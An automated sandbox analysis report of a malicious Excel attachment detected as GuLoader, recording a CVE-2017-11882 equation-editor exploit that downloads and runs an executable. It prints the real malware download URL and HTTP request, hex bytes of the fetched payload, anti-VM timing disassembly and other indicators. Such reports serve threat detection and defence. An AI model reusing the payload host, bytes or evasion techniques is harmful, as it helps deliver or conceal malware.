Analysis Report MKDRPSJS9E999494993.xlsx

Overview

General Information

Sample Name: MKDRPSJS9E999494993.xlsx
Analysis ID: 378980
MD5: 1a40446f940b183d3d94f0e31fc8560d
SHA1: 5db0c0c8d1e079b5a2d5bc2858a55ff4498c3fb3
SHA256: adfefd8b289eecc823dc6d2b2f9acf6e5a4e49db2917af74d34354ac867c3235
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Drops PE files to the user root directory
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Connects to a URL shortener service
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://stdyworkfinetraistfh.dns.army/findoc/svchost.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: MKDRPSJS9E999494993.xlsx ReversingLabs: Detection: 31%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 172.67.83.132:443 -> 192.168.2.22:49165 version: TLS 1.2

Software Vulnerabilities:

barindex
Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 72MB
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: is.gd
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.83.132:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.83.132:443

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49166 -> 103.141.138.118:80
Connects to a URL shortener service
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE DNS query: name: is.gd
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE DNS query: name: is.gd
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 31 Mar 2021 10:05:14 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0Last-Modified: Wed, 31 Mar 2021 00:01:16 GMTETag: "12000-5bec9d05b2f1c"Accept-Ranges: bytesContent-Length: 73728Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 75 9f f9 db 31 fe 97 88 31 fe 97 88 31 fe 97 88 b2 e2 99 88 30 fe 97 88 7e dc 9e 88 30 fe 97 88 07 d8 9a 88 30 fe 97 88 52 69 63 68 31 fe 97 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 78 16 0d 50 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 f0 00 00 00 20 00 00 00 00 00 00 08 12 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 06 00 06 00 04 00 00 00 00 00 00 00 00 20 01 00 00 10 00 00 a9 f5 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 ee 00 00 28 00 00 00 00 10 01 00 88 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 e1 00 00 00 10 00 00 00 f0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 18 0a 00 00 00 00 01 00 00 10 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 09 00 00 00 10 01 00 00 10 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 172.67.83.132 172.67.83.132
Source: Joe Sandbox View IP Address: 103.141.138.118 103.141.138.118
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /findoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: stdyworkfinetraistfh.dns.army
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3F1BB40.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /findoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: stdyworkfinetraistfh.dns.army
Source: unknown DNS traffic detected: queries for: is.gd
Source: vbc.exe, 00000004.00000002.2383679135.0000000003167000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000004.00000002.2383679135.0000000003167000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000002.2383679135.0000000003167000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000004.00000002.2383679135.0000000003167000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.2383679135.0000000003167000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown HTTPS traffic detected: 172.67.83.132:443 -> 192.168.2.22:49165 version: TLS 1.2

System Summary:

barindex
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe Jump to dropped file
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: MKDRPSJS9E999494993.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
PE file contains strange resources
Source: svchost[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/25@3/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$MKDRPSJS9E999494993.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR34A.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: MKDRPSJS9E999494993.xlsx ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: MKDRPSJS9E999494993.xlsx Static file information: File size 2663936 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: MKDRPSJS9E999494993.xlsx Initial sample: OLE indicators vbamacros = False
Source: MKDRPSJS9E999494993.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2692, type: MEMORY
Yara detected VB6 Downloader Generic
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2692, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040E754 push dword ptr [ebp+18h]; ret 4_2_0040ED2F
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406754 push esp; iretd 4_2_00406755
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404953 push dword ptr [ebp+18h]; ret 4_2_0040ED2F
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404CDC push es; ret 4_2_00404CDE
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040E754 push dword ptr [ebp+18h]; ret 4_2_0040ED2F
Source: C:\Users\Public\vbc.exe Code function: 4_2_003D60E3 push edi; retf 4_2_003D60E4

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: MKDRPSJS9E999494993.xlsx Stream path 'EncryptedPackage' entropy: 7.99992439687 (max. 8.0)

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2379236781.00000000003D0000.00000040.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE9
Source: vbc.exe Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000003D84DB second address: 00000000003D84DB instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F650CADF228h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f dec dword ptr [ebp+000000F8h] 0x00000025 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000002c jne 00007F650CADF1A9h 0x0000002e jmp 00007F650CADF21Eh 0x00000030 test di, 57D1h 0x00000035 call 00007F650CADF280h 0x0000003a call 00007F650CADF238h 0x0000003f lfence 0x00000042 mov edx, dword ptr [7FFE0014h] 0x00000048 lfence 0x0000004b ret 0x0000004c mov esi, edx 0x0000004e pushad 0x0000004f rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 4_2_003D3425 rdtsc 4_2_003D3425
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2544 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: vbc.exe, 00000004.00000002.2379236781.00000000003D0000.00000040.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe9
Source: vbc.exe Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 4_2_003D3425 rdtsc 4_2_003D3425
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 4_2_003D3039 mov eax, dword ptr fs:[00000030h] 4_2_003D3039
Source: C:\Users\Public\vbc.exe Code function: 4_2_003D2829 mov eax, dword ptr fs:[00000030h] 4_2_003D2829
Source: C:\Users\Public\vbc.exe Code function: 4_2_003D46B6 mov eax, dword ptr fs:[00000030h] 4_2_003D46B6
Source: C:\Users\Public\vbc.exe Code function: 4_2_003D33AE mov eax, dword ptr fs:[00000030h] 4_2_003D33AE
Source: C:\Users\Public\vbc.exe Code function: 4_2_003D6D88 mov eax, dword ptr fs:[00000030h] 4_2_003D6D88
Source: C:\Users\Public\vbc.exe Code function: 4_2_003D33E1 mov eax, dword ptr fs:[00000030h] 4_2_003D33E1
Source: C:\Users\Public\vbc.exe Code function: 4_2_003D7BC8 mov eax, dword ptr fs:[00000030h] 4_2_003D7BC8

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: vbc.exe, 00000004.00000002.2379363125.0000000000A00000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000004.00000002.2379363125.0000000000A00000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000004.00000002.2379363125.0000000000A00000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 378980 Sample: MKDRPSJS9E999494993.xlsx Startdate: 31/03/2021 Architecture: WINDOWS Score: 100 28 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->28 30 Antivirus detection for URL or domain 2->30 32 Multi AV Scanner detection for submitted file 2->32 34 13 other signatures 2->34 6 EQNEDT32.EXE 13 2->6         started        11 EXCEL.EXE 39 40 2->11         started        process3 dnsIp4 22 stdyworkfinetraistfh.dns.army 103.141.138.118, 49166, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 6->22 24 172.67.83.132, 443, 49165 CLOUDFLARENETUS United States 6->24 26 is.gd 6->26 16 C:\Users\user\AppData\...\svchost[1].exe, PE32 6->16 dropped 18 C:\Users\Public\vbc.exe, PE32 6->18 dropped 36 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 6->36 13 vbc.exe 6->13         started        20 C:\Users\user\...\~$MKDRPSJS9E999494993.xlsx, data 11->20 dropped file5 signatures6 process7 signatures8 38 Machine Learning detection for dropped file 13->38 40 Tries to detect virtualization through RDTSC time measurements 13->40
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.67.83.132
unknown United States
13335 CLOUDFLARENETUS false
103.141.138.118
stdyworkfinetraistfh.dns.army Viet Nam
135905 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN true

Contacted Domains

Name IP Active
is.gd 104.25.234.53 true
stdyworkfinetraistfh.dns.army 103.141.138.118 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://stdyworkfinetraistfh.dns.army/findoc/svchost.exe true
  • Avira URL Cloud: malware
unknown